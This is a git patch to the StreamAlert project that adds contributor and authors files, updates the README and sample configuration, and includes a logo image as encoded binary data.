From 40489d5cc2c1e9a7718ff0a0d2f6e53bf5d8fe6c Mon Sep 17 00:00:00 2001 From: Jack Naglieri Date: Tue, 7 Feb 2017 18:10:47 -0800 Subject: [PATCH] [docs][setup] doc updates and add jinja2 to requirements.txt [docs] update docs with additional deployment and setup details [docs] add streamalert authors [docs] add contributing guide [docs] feedback from #28 [docs] add streamalert logo [docs] README updates --- AUTHORS.rst | 10 +++ CONTRIBUTING.rst | 128 ++++++++++++++++++++++++++++ README.rst | 12 +-- conf/sample_sources.json | 4 +- docs/images/streamalert-logo.png | Bin 0 -> 105193 bytes docs/source/account.rst | 2 +- docs/source/clusters.rst | 2 +- docs/source/conf-datasources.rst | 19 +++-- docs/source/conf-schemas.rst | 2 +- docs/source/datasources.rst | 46 ++++++---- docs/source/getting-started.rst | 26 +++--- docs/source/index.rst | 8 +- docs/source/rules.rst | 142 ++++++++++++++++++------------- requirements.txt | 5 +- 14 files changed, 294 insertions(+), 112 deletions(-) create mode 100644 AUTHORS.rst create mode 100644 CONTRIBUTING.rst create mode 100644 docs/images/streamalert-logo.png diff --git a/AUTHORS.rst b/AUTHORS.rst new file mode 100644 index 000000000..d5f6860ab --- /dev/null +++ b/AUTHORS.rst @@ -0,0 +1,10 @@ +Below are a list of both core members and contributors to StreamAlert. + +Core Members: + * `Jack Naglieri `_ + * `Mime Frame `_ + * `Jamie Brim `_ + * `Austin Byers `_ + * `Chunyong Lin `_ + +Contributors: \ No newline at end of file diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst new file mode 100644 index 000000000..af4a358e4 --- /dev/null +++ b/CONTRIBUTING.rst @@ -0,0 +1,128 @@ +Contributing +============ + +Installing Dependencies +----------------------- + +Make sure you are running Python 2.7:: + + $ python -V + Python 2.7.x + +Install: + +1. `Pip `_ +2. `Terraform `_ + +Fork the StreamAlert repository from the UI, and then clone it locally:: + + $ git clone https://github.com//streamalert.git + +Change into the cloned StreamAlert repo, and install Python dependencies:: + + $ cd streamalert + $ pip install -r requirements.txt + +Making Changes +-------------- + +Checkout a new branch:: + + git checkout -b + +Make changes, add features, or fix bugs. + +When writing commit messages, make sure to prefix with one of the following tags:: + + [docs] # changes to StreamAlert documentation + [cli] # stream_alert_cli changes + [lambda][alert] # stream_alert lambda changes + [lambda][output] # stream_alert_output lambda changes + [terraform] # terraform changes + [core] # changes with core stream_alert classes used across both functions + [testing] # changes with testing infrastructure or processes + [setup] # StreamAlert development setup changes + +The first line of your commit message should be short. Use newlines to explain further:: + + [tag] short description + + * longer explanation of what the change is + * with added context + +.. note:: Please squash your similar commits into one. This keeps the repositories commit history easy to read. + +Commit Squashing +~~~~~~~~~~~~~~~~ + +If all of your commits fall within the same tag, you can squash them during the pull request process via the Github UI. If not, follow the steps below. + +Scenario: You have unstaged changes that you want to add into your last commit:: + + $ git add -u # add all tracked files + $ git commit --amend # commit these changes to the last commit + +Scenario: You have two commits you want to merge into one:: + + $ git log --oneline + c3dbbe9 [docs] add contributing guide + f5b038e [docs] add streamalert authors + 04e52c1 [setup] add jinja2 to requirements.txt + ... + +In this case, let's merge the two ``[docs]`` commits:: + + $ git rebase -i f5b038e~1 + pick f5b038e [docs] add streamalert authors + squash c3dbbe9 [docs] add contributing guide + +If your editor is `vim`, type `:wq` once you enter the above changes. + +This will now open a new window to modify your combined commit message. Make your edits, and exit once again. + +After rebasing, you will need to force push your branch if it already exists upstream:: + + $ git push origin -f + +Tests +----- + +Unit Testing +~~~~~~~~~~~~ + +StreamAlert contains unit tests for many parts of the code. When making changes, you need to ensure that you do not break existing functionality. To run unit tests locally:: + + # run this from the repo root + $ nosetests -v test/unit + +Each test should end with ``... ok``, and finally you should see ``OK`` at the end. + +If you are making changes which require unit test refactoring, please do so. + +If you are adding features to existing classes with tests, you must add test cases to verify expected behavior. + +Integration Testing +~~~~~~~~~~~~~~~~~~~ + +To verify StreamAlert works from end-to-end, locally, follow the testing instructions `here `_. + +Pull Request +------------ + +Once your code is ready for review, push the branch to your forked repository, and make a pull-request to the main ``airbnb/streamalert`` repo. + +The title of your pull request should be a short description of your changes. + +In your pull request body, use the following template:: + + to @airbnb/streamalert-maintainers + + size: small|medium|large + resolves: #1 # only add this if there's a relevant open issue related to this PR + + * summary of changes 1 + * summary of changes 2 + +All pull requests must pass continuous integration tests (nosetests) and receive a code review from one of the maintainers. + +After your branch has been accepted, you are free to merge into ``master``! \ No newline at end of file diff --git a/README.rst b/README.rst index 7073b72c2..4689a2aef 100644 --- a/README.rst +++ b/README.rst @@ -1,15 +1,13 @@ -********************************************************** StreamAlert - Serverless, Realtime Data Analysis Framework -********************************************************** +========================================================== .. image:: https://travis-ci.org/airbnb/streamalert.svg?branch=master :target: https://travis-ci.org/airbnb/streamalert StreamAlert is a serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define. -For more details, see our announcement post `here `_ - -*High-level*: +High-level +~~~~~~~~~~ * Deployment is automated: simple, safe and repeatable for any AWS account * Easily scalable from megabytes to terabytes per day @@ -20,8 +18,10 @@ For more details, see our announcement post `here `_ * `User Guide `_ * `Twitter `_ (unofficial) * `Slack `_ (unofficial) diff --git a/conf/sample_sources.json b/conf/sample_sources.json index 32ef994bd..916a6683c 100644 --- a/conf/sample_sources.json +++ b/conf/sample_sources.json @@ -7,13 +7,13 @@ $ ./stream_alert_cli.py terraform status */ { "kinesis": { - "cluster-1--kinesis-stream": { + "prefix_cluster1_stream_alert_kinesis": { "logs": [ "json_log_name", "csv_log_name" ] }, - "cluster-2-kinesis-stream": { + "prefix_cluster2_stream_alert_kinesis": { "logs": [ "json_log_name" ] diff --git a/docs/images/streamalert-logo.png b/docs/images/streamalert-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..330cd3e3ac730c8d95e5ede4cf5aae411593a8e6 GIT binary patch literal 105193 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 